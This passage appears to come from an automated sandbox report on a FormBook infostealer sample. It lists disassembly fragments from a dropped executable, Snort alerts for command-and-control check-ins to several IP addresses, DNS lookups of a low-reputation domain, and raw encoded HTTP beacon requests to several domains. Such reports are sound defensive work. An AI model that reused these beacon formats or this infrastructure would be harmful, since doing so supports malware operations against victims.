          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax16_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h16_3_02CAEC84
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]16_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]16_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]16_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]16_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]16_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]19_3_02CAEA30
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]19_3_02CAEA30
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]19_3_02CAEBDC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]19_3_02CAEBDC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx19_3_02CAEB88
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h19_3_02CAEB00
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]19_3_02CAE99C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]19_3_02CAE944
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax19_3_02CAEE2C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax19_3_02CAEE24
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h19_3_02CAEC84
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]19_3_02CAEC94
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]19_3_02D78AF4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h19_3_02D78AE4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]19_3_02D78A3C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]19_3_02D78A3C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]19_3_02D78890
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]19_3_02D78890
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx19_3_02D789E8
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h19_3_02D78960
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]19_3_02D787FC
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]19_3_02D787A4
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h19_3_02D78C8C
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax19_3_02D78C8C
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_104261B2
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_10426213
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi26_2_1041C3C2

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mobiessence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.trendyheld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.beastninjas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.importexportasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: